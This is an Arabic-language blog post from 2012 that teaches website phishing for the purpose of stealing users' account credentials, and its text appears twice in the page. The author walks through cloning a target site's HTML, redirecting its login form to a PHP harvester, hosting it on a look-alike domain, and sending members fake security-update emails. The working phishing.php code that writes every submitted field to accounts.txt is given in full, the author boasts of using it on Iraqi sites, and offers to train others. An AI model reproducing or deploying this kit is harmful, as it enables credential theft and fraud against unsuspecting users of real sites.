مدونة المبرمج العراقي: كيفية صيد المواقع العالمية ..وتحويل حسابات المسجلين إليك ..!!!!

Tuesday 3 July 2012

كيفية صيد المواقع العالمية ..وتحويل حسابات المسجلين إليك ..!!!!

تحية طيبة الى زوار المدونــــــة

من اهم طرق قرصنة المواقع العالمية حاليا هي طريقة صيد المواقع والتي تسمى فشنك …

Hacking web sites by Phishing method …..?

ماهي الفشنك …..؟؟؟

نتبع الاجراءات التالية …

لنفرض نحن نريد صيد حسابات المشتركين في الموقع التالي

http://www.any-web-site-to-phishing.com

نتبع الخطوات التالية :-

نذهب الى شريط الادوات للمستعرض الفايرفوكس موزيلا …
نضغط على view ثم page source لمعاينة المصدر البرمجي المكتوب بلغة HTML الترابطية التشعبية . وهو لغة ساكنة .
ثم نقوم بنسخة : edit —- select all —- copy
ثم فتح أي ملف في النوت باد النصي البسيط ..ولصق الملف فيه وخزنه باسم index.html
ثم البحث في الملف اعلاه عن التحرير عن كود برمجي وهو ”
<form method=”get” action=”http://www.any-web-site-to-phishing.com/phishing.php”>
وربطه بالبرنامج ادناه … بالصيغة
اسم البرنامج PHISHING.PHP
وملف لخزن الحسابات المستخدمين بصيغة ملف نصي
اذا الان لدينا ثلاثة ملفات وهما : index.html
وملف phishing.php
وملف نصي :accounts.txt

لكن يجب ان نجد موقع لكي تستضيف تلك الملفات اعلاه … لكن كن حذر والانتباه هناك كثير من مواقع الاستضافة المجانية …..لاتتقبل ملفات الصيد لكي لاتعاقب ضمن قائمة المواقع السوداء التي تم الحضر عليها من حيث الاستضافة ومراقبتها …

ان كنت تريد ان تنجخ ويتقبل موقع لاستضافتك عليك البحث والبحث والبحث عن مواقع تستضيف ملفاتك لصيد المواقع عن طريقهم …!!!. بعد ان يتم رفع الملفات ..الى المستضيف … ولتكن بصيغة اسم الموقع تقريبا أي مشابها لاسم الموقع المراد صيده ..!!!!

أي :

www.any-web-site-to-phishing.org

ثم بعد ذلك نقوم بارسال رسائل اخطار الى جميع المشتركين في هذا الموقع اعلاه

بالقيام بالتحديث لاغراض الامني لحسابهم …وارفاق رابط موقعك المزيف ..!!! اليهم ..!!!

فسوف يدخل المستخدم لتحديث حسابه بعد قراءة الرسالة القادمة من فريق الدعم الفني …!! فسوف يتم ارسال حسابه الى ملف :

Accounts.txt …..!!!

وبعد عدة مستخدمين لتفعيل رابط الموقع المزيف يتم تسجيل عدد معين من حسابات المستخدمين …!!

واليكم كود phishing.php

<?php

header(“Location: http://www.any-web-site-to-phishing.com”);

$handle = fopen(“accounts.txt”, “a”);

foreach($_GET as $variable => $value)

{

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “\r\n”);

}

fwrite($handle, “\r\n”);

fclose($handle);

exit;

?>

ملاحظة :-

تم تجريبها على بعض المواقع العراقية …!!! لان صيدها جدا سهلا وبسيطا هههههههههههه

واني على استعداد لكل مبرمج عراقي او عربي في تعلمه كيفية صيد أي موقع …!!!

يرجى الاتصال على البريد الالكتروني :

Iraq2009@fastmail.fm

تحياتي للجميع

وصيدا وفيرا …!! وبالتوفيق

No comments:

Pages

Tuesday 3 July 2012

كيفية صيد المواقع العالمية ..وتحويل حسابات المسجلين إليك ..!!!!

تحية طيبة الى زوار المدونــــــة

من اهم طرق قرصنة المواقع العالمية حاليا هي طريقة صيد المواقع والتي تسمى فشنك …

Hacking web sites by Phishing method …..?

ماهي الفشنك …..؟؟؟

نتبع الاجراءات التالية …

لنفرض نحن نريد صيد حسابات المشتركين في الموقع التالي

http://www.any-web-site-to-phishing.com

نتبع الخطوات التالية :-

نذهب الى شريط الادوات للمستعرض الفايرفوكس موزيلا …

نضغط على view ثم page source لمعاينة المصدر البرمجي المكتوب بلغة HTML الترابطية التشعبية . وهو لغة ساكنة .

ثم نقوم بنسخة : edit —- select all —- copy

ثم فتح أي ملف في النوت باد النصي البسيط ..ولصق الملف فيه وخزنه باسم index.html

ثم البحث في الملف اعلاه عن التحرير عن كود برمجي وهو ”

<form method=”get” action=”http://www.any-web-site-to-phishing.com/phishing.php”>

وربطه بالبرنامج ادناه … بالصيغة

اسم البرنامج PHISHING.PHP

وملف لخزن الحسابات المستخدمين بصيغة ملف نصي

اذا الان لدينا ثلاثة ملفات وهما : index.html

وملف phishing.php

وملف نصي :accounts.txt

أي :

www.any-web-site-to-phishing.org

ثم بعد ذلك نقوم بارسال رسائل اخطار الى جميع المشتركين في هذا الموقع اعلاه

بالقيام بالتحديث لاغراض الامني لحسابهم …وارفاق رابط موقعك المزيف ..!!! اليهم ..!!!

فسوف يدخل المستخدم لتحديث حسابه بعد قراءة الرسالة القادمة من فريق الدعم الفني …!! فسوف يتم ارسال حسابه الى ملف :

Accounts.txt …..!!!

وبعد عدة مستخدمين لتفعيل رابط الموقع المزيف يتم تسجيل عدد معين من حسابات المستخدمين …!!

واليكم كود phishing.php

<?php

header(“Location: http://www.any-web-site-to-phishing.com”);

$handle = fopen(“accounts.txt”, “a”);

foreach($_GET as $variable => $value)

{

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “\r\n”);

}

fwrite($handle, “\r\n”);

fclose($handle);

exit;

?>

ملاحظة :-

تم تجريبها على بعض المواقع العراقية …!!! لان صيدها جدا سهلا وبسيطا هههههههههههه

واني على استعداد لكل مبرمج عراقي او عربي في تعلمه كيفية صيد أي موقع …!!!

يرجى الاتصال على البريد الالكتروني :

Iraq2009@fastmail.fm

تحياتي للجميع

وصيدا وفيرا …!! وبالتوفيق

No comments:

Post a Comment